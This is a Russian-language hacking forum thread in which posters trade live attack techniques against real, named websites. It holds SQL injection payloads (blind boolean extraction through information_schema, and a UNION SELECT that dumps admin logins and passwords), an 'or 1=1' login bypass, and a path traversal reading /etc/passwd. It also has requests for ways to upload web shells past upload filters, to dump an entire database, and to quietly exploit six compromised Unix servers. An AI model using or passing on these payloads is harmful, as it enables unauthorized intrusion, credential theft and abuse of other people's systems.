Чо делать после с базой после расшифровки паса? Я тут одну вскрыл, но хз, что с ней делать. И как найти админку? КУды входить по этому пасу?
ну спс уже прочел но там: substring((select password from user limit 0,1),1,1) <=> substring((select password from user where id = 1) FROM 1 FOR 1) <=> mid((select password from user where id = 1) FROM 1 FOR 1) и в моем случае ?script=%2527))/**/and/**/lower(ascii(substring((select(table_name)from(info rmation_schema.tables)where/**/table_name=%2527CHARACTER_SETS%2527/**/LIMIT/**/1)/**/from/**/1/**/for/**/1)))=99/* тоесть названия определенной таблы написано и незнаю как делат запрос чтоб узнать вторую, третью и тд названия таблиц
Упс, там случилось что-то, не работает скрипт, ещё вчера была форма входа с sql Извиняюсь, ссылка битая теперь тут всё это лежит: http://dmironova.ru/admin/?lang=no
http://dmironova.ru/admin/ 'or 1=1/* http://dmironova.ru/admin/login.php?lang=../../../../../../etc/passwd%00
А то, что по второй ссылке прочитал ? Там показано как использовать лимит при фильтрации запятых. Вот похожая ситуация https://forum.antichat.ru/showpost.php?p=1550051 Разберись что и как и подгони запрос под свою скулю.
Собственно получил доступ к админке одного сайта, с расширением php файлы не хочет кушать , пробывал заливать с расширением php.jpg но тоже не помогает (так же можно залить в .doc .pdf форматах).. такое часто у меня случается , может есть какие либо способы залить шелл ещё ?
Database Version: 5.0.32-Debian_7etch5-log Проблемма такова делаю выборку : _http://www.skr.su/?div=spec&id=1344+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x2d2d2d2d,login,0x2d2d2d2d,pass,0x2d2d2d2d),0x71),0x71),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46+FROM+users+LIMIT+1,1-- показывает такой пароль админа (їљџ·„‚7) , причем смотрите сами такие пароли с аброкадаброй у вех пользователей . кто что думает ?
Такая ситуация есть сайт со скулей,но стоит лимит на вывод , БД довольнотаки большая , есть ли у кого мысли как сразу всё слить?шелл пока что не удалось залить =/
использовать GROUP_CONCAT() лучше вариантов вроде нету. https://forum.antichat.ru/showthread.php?t=118842
Сообственно один сайт инклудит страницу в iframe. Возможно ли как-то при помощи JavaScript'a модифицировать внешний вид того сайта, что инклудит? И что вообще можно сделать?
Посоветуйте, что можно сделать с шестью юникс дедиками имея на них только юзер привелегии? Желательно что нибудь полезное и что бы не сразу впалили.